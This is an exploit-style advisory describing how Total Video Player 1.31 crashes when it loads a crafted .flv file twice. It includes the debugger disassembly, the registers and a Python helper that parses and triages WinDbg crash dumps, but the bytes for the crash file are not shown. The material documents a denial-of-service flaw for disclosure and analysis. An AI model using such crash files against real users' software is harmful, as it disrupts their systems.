Total Video Player V1.31 [.flv] vuln after exception handling



EKU-ID: 2286 CVE: OSVDB-ID:
Author: Ayrbyte Published: 2012-06-12 Verified: Verified


/*##############################################################################################
title       : Total Video Player V1.31 [.flv] vuln after exception handling
author      : Ayrbyte
link        : http://www.softpedia.com/get/Multimedia/Video/Video-Players/Total-Video-Player.shtml
tested on   : windows 7
fb          : fb.me/Ayrbyte
greetz to   : thanks to Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,
              Zet Dot Exe and all b-compi family ^_^
              We are B-Compi... We are Hacker... We Are Proud...!
################################################################################################
The application crashes after test.flv is loaded twice.
On the first load of test.flv the error message "Cannot init video render" appears,
and TVP then reports "The file can not be played". When test.flv is loaded once more,
the program crashes.

[disassembly]
ntdll!KiRaiseUserExceptionDispatcher:
77016498 55               push    ebp
77016499 8bec             mov     ebp,esp
7701649b 83ec50           sub     esp,50h
7701649e 8944240c         mov     dword ptr [esp+0Ch],eax
770164a2 64a118000000     mov     eax,dword ptr fs:[00000018h]
770164a8 8b80a4010000     mov     eax,dword ptr [eax+1A4h]
770164ae 890424           mov     dword ptr [esp],eax
770164b1 c744240400000000 mov     dword ptr [esp+4],0
770164b9 c744240800000000 mov     dword ptr [esp+8],0
770164c1 c744241000000000 mov     dword ptr [esp+10h],0
770164c9 54               push    esp
770164ca e839000000       call    ntdll!RtlRaiseException (77016508)
770164cf 8b0424           mov     eax,dword ptr [esp]  ss:0023:0012c510=c0000008; <<--Access Violation
770164d2 8be5             mov     esp,ebp
770164d4 5d               pop     ebp
770164d5 c3               ret

[register]
eax=c0000008 ebx=00000000 ecx=0012c564 edx=77016498 esi=023408d0 edi=02340a40
eip=770164cf esp=0012c510 ebp=0012c560 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202

(ed8.548): Invalid handle - code c0000008 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!KiRaiseUserExceptionDispatcher+0x37:
770164cf 8b0424          mov     eax,dword ptr [esp]  ss:0023:0012c510=c0000008 <<--
Access Violation. Unhandled exception in tvp.exe (NTDLL.DLL):0xC0000005:
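As an added example (not part of the advisory or of TVP), the following Python helper parses a WinDbg excerpt of the shape shown above, pulls out the exception code, the faulting symbol and instruction, and the register values, and buckets the crash for triage; the sample text is constructed from the dump above, and the NTSTATUS name table and the set of system DLLs are the example's own assumptions.

```python
import re
# Constructed sample input (not the page's file), copied in shape from the advisory's WinDbg output.
SAMPLE = """(ed8.548): Invalid handle - code c0000008 (first chance)
First chance exceptions are reported before any exception handling.
ntdll!KiRaiseUserExceptionDispatcher+0x37:
770164cf 8b0424          mov     eax,dword ptr [esp]  ss:0023:0012c510=c0000008
eax=c0000008 ebx=00000000 ecx=0012c564 edx=77016498 esi=023408d0 edi=02340a40
eip=770164cf esp=0012c510 ebp=0012c560 iopl=0         nv up ei pl nz na po nc
"""

# Public NTSTATUS names for the codes a crash-triage script meets most often (assumed subset).
NTSTATUS_NAMES = {0xC0000005: "STATUS_ACCESS_VIOLATION", 0xC0000008: "STATUS_INVALID_HANDLE",
                  0xC000001D: "STATUS_ILLEGAL_INSTRUCTION", 0xC00000FD: "STATUS_STACK_OVERFLOW"}
SYSTEM_DLLS = {"ntdll", "kernel32", "KERNELBASE"}   # assumed list of "not the application" modules

EXC_RE = re.compile(r"^\(([0-9a-f]+)\.([0-9a-f]+)\): (.+?) - code ([0-9a-f]{8}) "
                    r"\((first|second) chance\)", re.M)
SYM_RE = re.compile(r"^(\w+)!(\w+)(?:\+0x[0-9a-f]+)?:$", re.M)          # module!symbol+0xNN:
INSN_RE = re.compile(r"^([0-9a-f]{8}) [0-9a-f]+\s+(\w+)\s+(.+)$", re.M)  # addr bytes mnemonic operands
REG_RE = re.compile(r"\b(e[a-z]{2})=([0-9a-f]{8})")                     # eax=..., eip=..., ...

def parse_windbg_excerpt(text):
    """Extract exception code, faulting symbol/instruction and registers from a WinDbg excerpt."""
    exc = EXC_RE.search(text)
    if exc is None:
        raise ValueError("no '(pid.tid): ... - code XXXXXXXX (... chance)' line found")
    pid, tid, desc, code, chance = exc.groups()
    sym, insn = SYM_RE.search(text), INSN_RE.search(text)
    regs = {name: int(val, 16) for name, val in REG_RE.findall(text)}
    faulting = int(insn.group(1), 16) if insn else None
    return {
        "pid": int(pid, 16), "tid": int(tid, 16), "description": desc,
        "code": int(code, 16), "status_name": NTSTATUS_NAMES.get(int(code, 16), "UNKNOWN"),
        "first_chance": chance == "first",
        "module": sym.group(1) if sym else None, "symbol": sym.group(2) if sym else None,
        "faulting_address": faulting, "mnemonic": insn.group(2) if insn else None,
        "registers": regs,
        # eip should equal the address WinDbg prints in front of the faulting instruction
        "eip_matches_insn": faulting is not None and regs.get("eip") == faulting,
    }

def triage(report):
    """Coarse bucket: kind of fault, and whether it was raised inside a system DLL or the application."""
    # STATUS_INVALID_HANDLE is raised deliberately via RtlRaiseException, not a memory fault
    kind = {0xC0000008: "handle-misuse", 0xC0000005: "memory-access"}.get(report["code"], "other")
    where = "system-dll" if report["module"] in SYSTEM_DLLS else "application"
    return kind, where
```

Running `triage(parse_windbg_excerpt(SAMPLE))` on the dump above yields a first-chance STATUS_INVALID_HANDLE raised inside ntdll, which is the state the advisory shows just before the unhandled exception.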
################################################################################################

Making the file test.avi:
open a hex editor, enter the following hex bytes (without the quotes), then save the file as test.flv

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

comment : for those reading this, sorry, it's manual for now because my compiler is currently broken ^_^
##############################################################################################*/